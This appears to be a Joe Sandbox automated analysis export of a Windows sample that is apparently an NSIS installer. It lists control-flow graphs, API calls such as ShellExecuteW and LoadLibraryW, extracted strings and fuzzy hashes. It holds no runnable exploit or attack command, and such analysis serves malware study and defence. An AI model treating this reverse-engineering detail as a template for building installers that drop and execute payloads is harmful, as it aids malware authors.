                                                                                                                                                                                                                                                                                                    control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 
493->466 495->476 497->470
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,QuarterWalt,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,QuarterWalt,QuarterWalt,00000000,00000000,QuarterWalt,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$QuarterWalt
                                                                                                                                                                                                                                                                                                    • API String ID: 4286501637-4128698268
                                                                                                                                                                                                                                                                                                    • Opcode ID: 98e1955186d6d9cc632069ee3d7f4d6f71a4f0819644fa762c3ecec58fabef84
                                                                                                                                                                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98e1955186d6d9cc632069ee3d7f4d6f71a4f0819644fa762c3ecec58fabef84
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00426976,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                    • String ID: (]C$... %d%%$pAB$viB$y)B
                                                                                                                                                                                                                                                                                                    • API String ID: 651206458-3423946372
                                                                                                                                                                                                                                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                    • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                    • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                    • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                    • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 795 402713-40273b call 406035 * 2 800 402746-402749 795->800 801 40273d-402743 call 40145c 795->801 803 402755-402758 800->803 804 40274b-402752 call 40145c 800->804 801->800 807 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 803->807 808 40275a-402761 call 40145c 803->808 804->803 808->807
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: <RM>$QuarterWalt$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                    • API String ID: 247603264-2360060177

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 816 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 827 402223-4030f2 call 4062cf 816->827 828 40220d-40221b call 4062cf 816->828 828->827
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                    • API String ID: 3156913733-2180253247

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 836 405eab-405eb7 837 405eb8-405eec GetTickCount GetTempFileNameW 836->837 838 405efb-405efd 837->838 839 405eee-405ef0 837->839 841 405ef5-405ef8 838->841 839->837 840 405ef2 839->840 840->841
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                    • String ID: nsa
                                                                                                                                                                                                                                                                                                    • API String ID: 1716503409-2209301699

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 842 402175-40218b call 401446 * 2 847 402198-40219d 842->847 848 40218d-402197 call 4062cf 842->848 849 4021aa-4021b0 EnableWindow 847->849 850 40219f-4021a5 ShowWindow 847->850 848->847 852 4030e3-4030f2 849->852 850->852
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
